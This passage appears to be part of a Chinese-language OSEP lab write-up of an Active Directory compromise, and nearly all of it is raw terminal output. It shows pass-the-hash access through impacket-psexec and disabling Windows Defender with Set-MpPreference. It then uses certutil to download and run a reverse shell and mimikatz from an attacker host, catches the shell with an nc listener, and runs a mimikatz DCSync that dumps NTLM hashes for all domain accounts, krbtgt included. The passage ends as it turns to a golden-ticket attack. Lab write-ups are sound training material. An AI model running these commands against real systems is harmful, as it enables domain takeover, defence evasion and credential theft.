利用从172.16.243.188抓取的nina用户及其hash连接:
**proxychains4 impacket-psexec -hashes :1d4c153225b424290188504b9e0541eb [email protected] 130 ⨯**
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.180:445 ... OK
[*] Requesting shares on 172.16.243.180.....
[*] Found writable share ADMIN$
[*] Uploading file bKMSKXFp.exe
[*] Opening SVCManager on 172.16.243.180.....
[*] Creating service XnXl on 172.16.243.180.....
[*] Starting service XnXl.....
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.180:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.180:445 ... OK
[!] Press help for extra shell commands
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.243.180:445 ... OK
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\\Windows\\system32> whoami
nt authority\\system
C:\\Windows\\system32> cd c:\\Users\\Administrator\\Desktop
c:\\Users\\Administrator\\Desktop> more proof.txt
716455142324167230fb17bb3a3df487
c:\\Users\\Administrator\\Desktop> hostname
**dc01**
c:\\Users\\Administrator\\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.16.243.180
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.243.254
c:\\Users\\Administrator\\Desktop> **powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"**
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.
c:\\Users\\Administrator\\Desktop> **certutil.exe -urlcache -f <http://192.168.49.243/revshell.exe> revshell.exe**
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop> revshell.exe
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.243] from (UNKNOWN) [192.168.243.189] 63925
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\\Users\\Administrator\\Desktop>certutil.exe -urlcache -f <http://192.168.49.243/mimikatz.exe> mimikatz.exe
certutil.exe -urlcache -f <http://192.168.49.243/mimikatz.exe> mimikatz.exe
**** Online ****
CertUtil: -URLCache command completed successfully.
c:\\Users\\Administrator\\Desktop>ping dc02.dev.final.com
ping dc02.dev.final.com
Pinging **dc02.dev.final.com [172.16.243.192]** with 32 bytes of data:
Reply from 172.16.243.192: bytes=32 time<1ms TTL=128
Reply from 172.16.243.192: bytes=32 time<1ms TTL=128
Reply from 172.16.243.192: bytes=32 time<1ms TTL=128
Reply from 172.16.243.192: bytes=32 time<1ms TTL=128
Ping statistics for 172.16.243.192:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
DCSYNC
c:\\Users\\Administrator\\Desktop>**mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:final.com /all /csv" "exit"**
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:final.com /all /csv" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::dcsync /domain:final.com /all /csv
[DC] 'final.com' will be the domain
[DC] 'dc01.final.com' will be the DC server
[DC] Exporting domain 'final.com'
502 krbtgt 405854caaf49b41e0e585369a001f114
1110 nina 25af00893895d3d871e625c5d4261539
500 Administrator 0474d3f0a74d30f13f1fec243e8ac3cb
1000 DC01$ 9b13612949f2bb25a5e1800de2936782
1120 ANSIBLE06$ a297ac37be95c8ae5057d188a159f7fe
1114 sqlsvc11 c0f6442ea39956aebf28219639ba9953
1115 adminWebSvc b0df1cb0819ca0b7d476d4c868175b94
1113 sqlsvc03 77f944ff6e0c0ed0c83dcef57bdf9298
1118 WEB05$ d637365b294ea57f5184cc333fa9f7eb
1119 JUMP03$ 3d73c8bfdc0056a98dfea33d42ac867a
1116 SQL03$ c52a092a8e12c89fda86819b12f06a06
1117 SQL11$ d218ba4449ccace7ecfa7f21440f42c6
1103 DEV$ d960c23b8336e64483b1e78362e15201
1109 tina 1d4c153225b424290188504b9e0541eb
1112 tommy 5ad27ee8000951e0669fab25f73f9d8a
mimikatz(commandline) # exit
Bye!
c:\\Users\\Administrator\\Desktop>mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:final.com /all" "exit"
mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:final.com /all" "exit"
.#####. mimikatz 2.2.0 (x64) #18362 Jan 4 2020 18:59:26
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <http://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <http://pingcastle.com> / <http://mysmartlogon.com> ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # lsadump::dcsync /domain:final.com /all
[DC] 'final.com' will be the domain
[DC] 'dc01.final.com' will be the DC server
[DC] Exporting domain 'final.com'
Object RDN : final
Object RDN : LostAndFound
Object RDN : Deleted Objects
Object RDN : Users
Object RDN : Computers
Object RDN : System
Object RDN : WinsockServices
Object RDN : RpcServices
Object RDN : FileLinks
Object RDN : VolumeTable
Object RDN : ObjectMoveTable
Object RDN : Default Domain Policy
Object RDN : AppCategories
Object RDN : Meetings
Object RDN : Policies
Object RDN : User
Object RDN : Machine
Object RDN : {6AC1786C-016F-11D2-945F-00C04fB984F9}
Object RDN : User
Object RDN : Machine
Object RDN : RAS and IAS Servers Access Check
Object RDN : File Replication Service
Object RDN : Dfs-Configuration
Object RDN : IP Security
Object RDN : ipsecPolicy{72385230-70FA-11D1-864C-14A300000000}
Object RDN : ipsecISAKMPPolicy{72385231-70FA-11D1-864C-14A300000000}
Object RDN : ipsecNFA{72385232-70FA-11D1-864C-14A300000000}
Object RDN : ipsecNFA{59319BE2-5EE3-11D2-ACE8-0060B0ECCA17}
Object RDN : ipsecNFA{594272E2-071D-11D3-AD22-0060B0ECCA17}
Object RDN : ipsecPolicy{72385236-70FA-11D1-864C-14A300000000}
Object RDN : ipsecISAKMPPolicy{72385237-70FA-11D1-864C-14A300000000}
Object RDN : ipsecNFA{59319C04-5EE3-11D2-ACE8-0060B0ECCA17}
Object RDN : ipsecPolicy{7238523C-70FA-11D1-864C-14A300000000}
Object RDN : ipsecISAKMPPolicy{7238523D-70FA-11D1-864C-14A300000000}
Object RDN : ipsecNFA{7238523E-70FA-11D1-864C-14A300000000}
Object RDN : ipsecNFA{59319BF3-5EE3-11D2-ACE8-0060B0ECCA17}
Object RDN : ipsecNFA{6A1F5C6F-72B7-11D2-ACF0-0060B0ECCA17}
Object RDN : ipsecNFA{594272FD-071D-11D3-AD22-0060B0ECCA17}
Object RDN : ipsecNegotiationPolicy{59319BDF-5EE3-11D2-ACE8-0060B0ECCA17}
Object RDN : ipsecNegotiationPolicy{59319BF0-5EE3-11D2-ACE8-0060B0ECCA17}
Object RDN : ipsecNegotiationPolicy{59319C01-5EE3-11D2-ACE8-0060B0ECCA17}
Object RDN : ipsecNegotiationPolicy{72385233-70FA-11D1-864C-14A300000000}
Object RDN : ipsecNegotiationPolicy{7238523F-70FA-11D1-864C-14A300000000}
Object RDN : ipsecNegotiationPolicy{7238523B-70FA-11D1-864C-14A300000000}
Object RDN : ipsecFilter{7238523A-70FA-11D1-864C-14A300000000}
Object RDN : ipsecFilter{72385235-70FA-11D1-864C-14A300000000}
Object RDN : ComPartitions
Object RDN : ComPartitionSets
Object RDN : WMIPolicy
Object RDN : PolicyTemplate
Object RDN : SOM
Object RDN : PolicyType
Object RDN : WMIGPO
Object RDN : DomainUpdates
Object RDN : Operations
Object RDN : ab402345-d3c3-455d-9ff7-40268a1099b6
Object RDN : bab5f54d-06c8-48de-9b87-d78b796564e4
Object RDN : f3dd09dd-25e8-4f9c-85df-12d6d2f2f2f5
Object RDN : 2416c60a-fe15-4d7a-a61e-dffd5df864d3
Object RDN : 7868d4c8-ac41-4e05-b401-776280e8e9f1
Object RDN : 860c36ed-5241-4c62-a18b-cf6ff9994173
Object RDN : 0e660ea3-8a5e-4495-9ad7-ca1bd4638f9e
Object RDN : a86fe12a-0f62-4e2a-b271-d27f601f8182
Object RDN : d85c0bfd-094f-4cad-a2b5-82ac9268475d
Object RDN : 6ada9ff7-c9df-45c1-908e-9fef2fab008a
Object RDN : 10b3ad2a-6883-4fa7-90fc-6377cbdc1b26
Object RDN : 98de1d3e-6611-443b-8b4e-f4337f1ded0b
Object RDN : f607fd87-80cf-45e2-890b-6cf97ec0e284
Object RDN : 9cac1f66-2167-47ad-a472-2a13251310e4
Object RDN : 6ff880d6-11e7-4ed1-a20f-aac45da48650
Object RDN : 446f24ea-cfd5-4c52-8346-96e170bcb912
Object RDN : 51cba88b-99cf-4e16-bef2-c427b38d0767
Object RDN : a3dac986-80e7-4e59-a059-54cb1ab43cb9
Object RDN : 293f0798-ea5c-4455-9f5d-45f33a30703b
Object RDN : 5c82b233-75fc-41b3-ac71-c69592e6bf15
Object RDN : 7ffef925-405b-440a-8d58-35e8cd6e98c3
Object RDN : 4dfbb973-8a62-4310-a90c-776e00f83222
Object RDN : 8437C3D8-7689-4200-BF38-79E4AC33DFA0
Object RDN : 7cfb016c-4f87-4406-8166-bd9df943947f
Object RDN : f7ed4553-d82b-49ef-a839-2f38a36bb069
Object RDN : 8ca38317-13a4-4bd4-806f-ebed6acb5d0c
Object RDN : 3c784009-1f57-4e2a-9b04-6915c9e71961
Object RDN : 6bcd5678-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5679-8314-11d6-977b-00c04f613221
Object RDN : 6bcd567a-8314-11d6-977b-00c04f613221
Object RDN : 6bcd567b-8314-11d6-977b-00c04f613221
Object RDN : 6bcd567c-8314-11d6-977b-00c04f613221
Object RDN : 6bcd567d-8314-11d6-977b-00c04f613221
Object RDN : 6bcd567e-8314-11d6-977b-00c04f613221
Object RDN : 6bcd567f-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5680-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5681-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5682-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5683-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5684-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5685-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5686-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5687-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5688-8314-11d6-977b-00c04f613221
Object RDN : 6bcd5689-8314-11d6-977b-00c04f613221
Object RDN : 6bcd568a-8314-11d6-977b-00c04f613221
Object RDN : 6bcd568b-8314-11d6-977b-00c04f613221
Object RDN : 6bcd568c-8314-11d6-977b-00c04f613221
Object RDN : 6bcd568d-8314-11d6-977b-00c04f613221
Object RDN : 3051c66f-b332-4a73-9a20-2d6a7d6e6a1c
Object RDN : 3e4f4182-ac5d-4378-b760-0eab2de593e2
Object RDN : c4f17608-e611-11d6-9793-00c04f613221
Object RDN : 13d15cf0-e6c8-11d6-9793-00c04f613221
Object RDN : 8ddf6913-1c7b-4c59-a5af-b9ca3b3d2c4c
Object RDN : dda1d01d-4bd7-4c49-a184-46f9241b560e
Object RDN : a1789bfb-e0a2-4739-8cc0-e77d892d080a
Object RDN : 61b34cb0-55ee-4be9-b595-97810b92b017
Object RDN : 57428d75-bef7-43e1-938b-2e749f5a8d56
Object RDN : ebad865a-d649-416f-9922-456b53bbb5b8
Object RDN : 0b7fb422-3609-4587-8c2e-94b10f67d1bf
Object RDN : 2951353e-d102-4ea5-906c-54247eeec741
Object RDN : 71482d49-8870-4cb3-a438-b6fc9ec35d70
Object RDN : aed72870-bf16-4788-8ac7-22299c8207f1
Object RDN : f58300d1-b71a-4DB6-88a1-a8b9538beaca
Object RDN : 231fb90b-c92a-40c9-9379-bacfc313a3e3
Object RDN : 4aaabc3a-c416-4b9c-a6bb-4b453ab1c1f0
Object RDN : 9738c400-7795-4d6e-b19d-c16cd6486166
Object RDN : de10d491-909f-4fb0-9abb-4b7865c0fe80
Object RDN : b96ed344-545a-4172-aa0c-68118202f125
Object RDN : 4c93ad42-178a-4275-8600-16811d28f3aa
Object RDN : c88227bc-fcca-4b58-8d8a-cd3d64528a02
Object RDN : 5e1574f6-55df-493e-a671-aaeffca6a100
Object RDN : d262aae8-41f7-48ed-9f35-56bbb677573d
Object RDN : 82112ba0-7e4c-4a44-89d9-d46c9612bf91
Object RDN : c3c927a6-cc1d-47c0-966b-be8f9b63d991
Object RDN : 54afcfb9-637a-4251-9f47-4d50e7021211
Object RDN : f4728883-84dd-483c-9897-274f2ebcf11e
Object RDN : ff4f9d27-7157-4cb0-80a9-5d6f2b14c8ff
Object RDN : 83C53DA7-427E-47A4-A07A-A324598B88F7
Object RDN : C81FC9CC-0130-4FD1-B272-634D74818133
Object RDN : E5F9E791-D96D-4FC9-93C9-D53E1DC439BA
Object RDN : e6d5fd00-385d-4e65-b02d-9da3493ed850
Object RDN : 3a6b3fbf-3168-4312-a10d-dd5b3393952d
Object RDN : 7F950403-0AB3-47F9-9730-5D7B0269F9BD
Object RDN : 434bb40d-dbc9-4fe7-81d4-d57229f7b080
Object RDN : A0C238BA-9E30-4EE6-80A6-43F731E9A5CD
Object RDN : Windows2003Update
Object RDN : ActiveDirectoryUpdate
Object RDN : Password Settings Container
Object RDN : PSPs
Object RDN : Domain Controllers
Object RDN : Infrastructure
Object RDN : ForeignSecurityPrincipals
Object RDN : Program Data
Object RDN : Microsoft
Object RDN : NTDS Quotas
Object RDN : Managed Service Accounts
Object RDN : TPM Devices
Object RDN : Keys
Object RDN : Guest
** SAM ACCOUNT **
SAM Username : Guest
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-501
Object Relative ID : 501
Credentials:
Object RDN : Builtin
Object RDN : S-1-5-4
Object RDN : S-1-5-11
Object RDN : Remote Desktop Users
** SAM ACCOUNT **
SAM Username : Remote Desktop Users
Object Security ID : S-1-5-32-555
Object Relative ID : 555
Credentials:
Object RDN : Network Configuration Operators
** SAM ACCOUNT **
SAM Username : Network Configuration Operators
Object Security ID : S-1-5-32-556
Object Relative ID : 556
Credentials:
Object RDN : Performance Monitor Users
** SAM ACCOUNT **
SAM Username : Performance Monitor Users
Object Security ID : S-1-5-32-558
Object Relative ID : 558
Credentials:
Object RDN : Performance Log Users
** SAM ACCOUNT **
SAM Username : Performance Log Users
Object Security ID : S-1-5-32-559
Object Relative ID : 559
Credentials:
Object RDN : Distributed COM Users
** SAM ACCOUNT **
SAM Username : Distributed COM Users
Object Security ID : S-1-5-32-562
Object Relative ID : 562
Credentials:
Object RDN : S-1-5-17
Object RDN : IIS_IUSRS
** SAM ACCOUNT **
SAM Username : IIS_IUSRS
Object Security ID : S-1-5-32-568
Object Relative ID : 568
Credentials:
Object RDN : Cryptographic Operators
** SAM ACCOUNT **
SAM Username : Cryptographic Operators
Object Security ID : S-1-5-32-569
Object Relative ID : 569
Credentials:
Object RDN : Event Log Readers
** SAM ACCOUNT **
SAM Username : Event Log Readers
Object Security ID : S-1-5-32-573
Object Relative ID : 573
Credentials:
Object RDN : Certificate Service DCOM Access
** SAM ACCOUNT **
SAM Username : Certificate Service DCOM Access
Object Security ID : S-1-5-32-574
Object Relative ID : 574
Credentials:
Object RDN : RDS Remote Access Servers
** SAM ACCOUNT **
SAM Username : RDS Remote Access Servers
Object Security ID : S-1-5-32-575
Object Relative ID : 575
Credentials:
Object RDN : RDS Endpoint Servers
** SAM ACCOUNT **
SAM Username : RDS Endpoint Servers
Object Security ID : S-1-5-32-576
Object Relative ID : 576
Credentials:
Object RDN : RDS Management Servers
** SAM ACCOUNT **
SAM Username : RDS Management Servers
Object Security ID : S-1-5-32-577
Object Relative ID : 577
Credentials:
Object RDN : Hyper-V Administrators
** SAM ACCOUNT **
SAM Username : Hyper-V Administrators
Object Security ID : S-1-5-32-578
Object Relative ID : 578
Credentials:
Object RDN : Access Control Assistance Operators
** SAM ACCOUNT **
SAM Username : Access Control Assistance Operators
Object Security ID : S-1-5-32-579
Object Relative ID : 579
Credentials:
Object RDN : Remote Management Users
** SAM ACCOUNT **
SAM Username : Remote Management Users
Object Security ID : S-1-5-32-580
Object Relative ID : 580
Credentials:
Object RDN : Storage Replica Administrators
** SAM ACCOUNT **
SAM Username : Storage Replica Administrators
Object Security ID : S-1-5-32-582
Object Relative ID : 582
Credentials:
Object RDN : Domain Computers
** SAM ACCOUNT **
SAM Username : Domain Computers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-515
Object Relative ID : 515
Credentials:
Object RDN : Cert Publishers
** SAM ACCOUNT **
SAM Username : Cert Publishers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-517
Object Relative ID : 517
Credentials:
Object RDN : Domain Users
** SAM ACCOUNT **
SAM Username : Domain Users
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-513
Object Relative ID : 513
Credentials:
Object RDN : Domain Guests
** SAM ACCOUNT **
SAM Username : Domain Guests
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-514
Object Relative ID : 514
Credentials:
Object RDN : RAS and IAS Servers
** SAM ACCOUNT **
SAM Username : RAS and IAS Servers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-553
Object Relative ID : 553
Credentials:
Object RDN : Incoming Forest Trust Builders
** SAM ACCOUNT **
SAM Username : Incoming Forest Trust Builders
Object Security ID : S-1-5-32-557
Object Relative ID : 557
Credentials:
Object RDN : Terminal Server License Servers
** SAM ACCOUNT **
SAM Username : Terminal Server License Servers
Object Security ID : S-1-5-32-561
Object Relative ID : 561
Credentials:
Object RDN : Users
** SAM ACCOUNT **
SAM Username : Users
Object Security ID : S-1-5-32-545
Object Relative ID : 545
Credentials:
Object RDN : Guests
** SAM ACCOUNT **
SAM Username : Guests
Object Security ID : S-1-5-32-546
Object Relative ID : 546
Credentials:
Object RDN : Group Policy Creator Owners
** SAM ACCOUNT **
SAM Username : Group Policy Creator Owners
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-520
Object Relative ID : 520
Credentials:
Object RDN : Pre-Windows 2000 Compatible Access
** SAM ACCOUNT **
SAM Username : Pre-Windows 2000 Compatible Access
Object Security ID : S-1-5-32-554
Object Relative ID : 554
Credentials:
Object RDN : S-1-5-9
Object RDN : Windows Authorization Access Group
** SAM ACCOUNT **
SAM Username : Windows Authorization Access Group
Object Security ID : S-1-5-32-560
Object Relative ID : 560
Credentials:
Object RDN : 6E157EDF-4E72-4052-A82A-EC3F91021A22
Object RDN : Allowed RODC Password Replication Group
** SAM ACCOUNT **
SAM Username : Allowed RODC Password Replication Group
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-571
Object Relative ID : 571
Credentials:
Object RDN : Enterprise Read-only Domain Controllers
** SAM ACCOUNT **
SAM Username : Enterprise Read-only Domain Controllers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-498
Object Relative ID : 498
Credentials:
Object RDN : Denied RODC Password Replication Group
** SAM ACCOUNT **
SAM Username : Denied RODC Password Replication Group
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-572
Object Relative ID : 572
Credentials:
Object RDN : Cloneable Domain Controllers
** SAM ACCOUNT **
SAM Username : Cloneable Domain Controllers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-522
Object Relative ID : 522
Credentials:
Object RDN : Protected Users
** SAM ACCOUNT **
SAM Username : Protected Users
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-525
Object Relative ID : 525
Credentials:
Object RDN : DnsAdmins
** SAM ACCOUNT **
SAM Username : DnsAdmins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1101
Object Relative ID : 1101
Credentials:
Object RDN : DnsUpdateProxy
** SAM ACCOUNT **
SAM Username : DnsUpdateProxy
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1102
Object Relative ID : 1102
Credentials:
Object RDN : MicrosoftDNS
Object RDN : DFSR-GlobalSettings
Object RDN : Domain System Volume
Object RDN : RootDNSServers
Object RDN : Content
Object RDN : @
Object RDN : SYSVOL Share
Object RDN : a.root-servers.net
Object RDN : Topology
Object RDN : DC01
Object RDN : b.root-servers.net
Object RDN : c.root-servers.net
Object RDN : Domain System Volume
Object RDN : d.root-servers.net
Object RDN : e.root-servers.net
Object RDN : f.root-servers.net
Object RDN : g.root-servers.net
Object RDN : h.root-servers.net
Object RDN : i.root-servers.net
Object RDN : j.root-servers.net
Object RDN : k.root-servers.net
Object RDN : l.root-servers.net
Object RDN : m.root-servers.net
Object RDN : Server
Object RDN : DFSR-LocalSettings
Object RDN : SYSVOL Subscription
Object RDN : AdminSDHolder
Object RDN : Schema Admins
** SAM ACCOUNT **
SAM Username : Schema Admins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-518
Object Relative ID : 518
Credentials:
Object RDN : Key Admins
** SAM ACCOUNT **
SAM Username : Key Admins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-526
Object Relative ID : 526
Credentials:
Object RDN : Enterprise Key Admins
** SAM ACCOUNT **
SAM Username : Enterprise Key Admins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-527
Object Relative ID : 527
Credentials:
Object RDN : Enterprise Admins
** SAM ACCOUNT **
SAM Username : Enterprise Admins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-519
Object Relative ID : 519
Credentials:
Object RDN : Server Operators
** SAM ACCOUNT **
SAM Username : Server Operators
Object Security ID : S-1-5-32-549
Object Relative ID : 549
Credentials:
Object RDN : Print Operators
** SAM ACCOUNT **
SAM Username : Print Operators
Object Security ID : S-1-5-32-550
Object Relative ID : 550
Credentials:
Object RDN : Backup Operators
** SAM ACCOUNT **
SAM Username : Backup Operators
Object Security ID : S-1-5-32-551
Object Relative ID : 551
Credentials:
Object RDN : Account Operators
** SAM ACCOUNT **
SAM Username : Account Operators
Object Security ID : S-1-5-32-548
Object Relative ID : 548
Credentials:
Object RDN : Administrators
** SAM ACCOUNT **
SAM Username : Administrators
Object Security ID : S-1-5-32-544
Object Relative ID : 544
Credentials:
Object RDN : Replicator
** SAM ACCOUNT **
SAM Username : Replicator
Object Security ID : S-1-5-32-552
Object Relative ID : 552
Credentials:
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-502
Object Relative ID : 502
Credentials:
Hash NTLM: 405854caaf49b41e0e585369a001f114
Object RDN : Read-only Domain Controllers
** SAM ACCOUNT **
SAM Username : Read-only Domain Controllers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-521
Object Relative ID : 521
Credentials:
Object RDN : Domain Controllers
** SAM ACCOUNT **
SAM Username : Domain Controllers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-516
Object Relative ID : 516
Credentials:
Object RDN : DomainDnsZones
Object RDN : Configuration
Object RDN : ForestDnsZones
Object RDN : FinalAdmins
Object RDN : FinalUsers
Object RDN : FinalUsers
Object RDN : FinalServices
Object RDN : FinalComputers
Object RDN : FinalWin
Object RDN : FinalLinux
Object RDN : SQLAdmins
** SAM ACCOUNT **
SAM Username : SQLAdmins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1104
Object Relative ID : 1104
Credentials:
Object RDN : FinalGroups
Object RDN : Mgt
Object RDN : LinuxAdmin
** SAM ACCOUNT **
SAM Username : LinuxAdmin
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1108
Object Relative ID : 1108
Credentials:
Object RDN : Domain Admins
** SAM ACCOUNT **
SAM Username : Domain Admins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-512
Object Relative ID : 512
Credentials:
Object RDN : MgtUsers
** SAM ACCOUNT **
SAM Username : MgtUsers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1106
Object Relative ID : 1106
Credentials:
Object RDN : LinuxUsers
** SAM ACCOUNT **
SAM Username : LinuxUsers
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1107
Object Relative ID : 1107
Credentials:
Object RDN : WebAdmins
** SAM ACCOUNT **
SAM Username : WebAdmins
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1105
Object Relative ID : 1105
Credentials:
Object RDN : Machine
Object RDN : User
Object RDN : {A4D14608-3D05-42F1-9325-07EA5A08468C}
Object RDN : Machine
Object RDN : User
Object RDN : SQLServer
Object RDN : {4BA6AC26-8B23-4F4F-9DC7-9B248BEBE7E4}
Object RDN : Machine
Object RDN : User
Object RDN : WebServer
Object RDN : {34BE65EC-7DBA-46FB-B6B1-46094400C0E6}
Object RDN : dev
Object RDN : BCKUPKEY_78b1c7c3-c251-4496-baea-c00bd9193fc5 Secret
Object RDN : BCKUPKEY_P Secret
Object RDN : BCKUPKEY_8c4175f2-282f-4270-a8ce-1f65ff66f14c Secret
Object RDN : BCKUPKEY_PREFERRED Secret
Object RDN : Nina
** SAM ACCOUNT **
SAM Username : nina
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1110
Object Relative ID : 1110
Credentials:
Hash NTLM: 25af00893895d3d871e625c5d4261539
Object RDN : Machine
Object RDN : User
Object RDN : {D231BF9D-4D1A-41E3-8C02-8CD2129362A8}
Object RDN : Machine
Object RDN : User
Object RDN : MgtServer
Object RDN : {2315106E-5A95-4E22-A6F9-807AE48D4EC0}
Object RDN : {31B2F340-016D-11D2-945F-00C04FB984F9}
Object RDN : RID Manager$
Object RDN : RID Set
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-500
Object Relative ID : 500
Credentials:
Hash NTLM: 0474d3f0a74d30f13f1fec243e8ac3cb
Object RDN : DC01
** SAM ACCOUNT **
SAM Username : DC01$
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1000
Object Relative ID : 1000
Credentials:
Hash NTLM: 9b13612949f2bb25a5e1800de2936782
Object RDN : ANSIBLE06
** SAM ACCOUNT **
SAM Username : ANSIBLE06$
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1120
Object Relative ID : 1120
Credentials:
Hash NTLM: a297ac37be95c8ae5057d188a159f7fe
Object RDN : sqlsvc11
** SAM ACCOUNT **
SAM Username : sqlsvc11
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1114
Object Relative ID : 1114
Credentials:
Hash NTLM: c0f6442ea39956aebf28219639ba9953
Object RDN : adminWebSvc
** SAM ACCOUNT **
SAM Username : adminWebSvc
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1115
Object Relative ID : 1115
Credentials:
Hash NTLM: b0df1cb0819ca0b7d476d4c868175b94
Object RDN : sqlsvc03
** SAM ACCOUNT **
SAM Username : sqlsvc03
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1113
Object Relative ID : 1113
Credentials:
Hash NTLM: 77f944ff6e0c0ed0c83dcef57bdf9298
Object RDN : WEB05
** SAM ACCOUNT **
SAM Username : WEB05$
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1118
Object Relative ID : 1118
Credentials:
Hash NTLM: d637365b294ea57f5184cc333fa9f7eb
Object RDN : JUMP03
** SAM ACCOUNT **
SAM Username : JUMP03$
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1119
Object Relative ID : 1119
Credentials:
Hash NTLM: 3d73c8bfdc0056a98dfea33d42ac867a
Object RDN : SQL03
** SAM ACCOUNT **
SAM Username : SQL03$
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1116
Object Relative ID : 1116
Credentials:
Hash NTLM: c52a092a8e12c89fda86819b12f06a06
Object RDN : SQL11
** SAM ACCOUNT **
SAM Username : SQL11$
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1117
Object Relative ID : 1117
Credentials:
Hash NTLM: d218ba4449ccace7ecfa7f21440f42c6
Object RDN : dev.final.com
Object RDN : DEV$
** SAM ACCOUNT **
SAM Username : DEV$
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1103
Object Relative ID : 1103
Credentials:
Hash NTLM: d960c23b8336e64483b1e78362e15201
Object RDN : Tina
** SAM ACCOUNT **
SAM Username : tina
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1109
Object Relative ID : 1109
Credentials:
Hash NTLM: 1d4c153225b424290188504b9e0541eb
Object RDN : Tommy
** SAM ACCOUNT **
SAM Username : tommy
Object Security ID : S-1-5-21-1725955968-4040474791-670206374-1112
Object Relative ID : 1112
Credentials:
Hash NTLM: 5ad27ee8000951e0669fab25f73f9d8a
mimikatz(commandline) # exit
Bye!
利用黄金票据获取对172.16.243.192的访问权限:
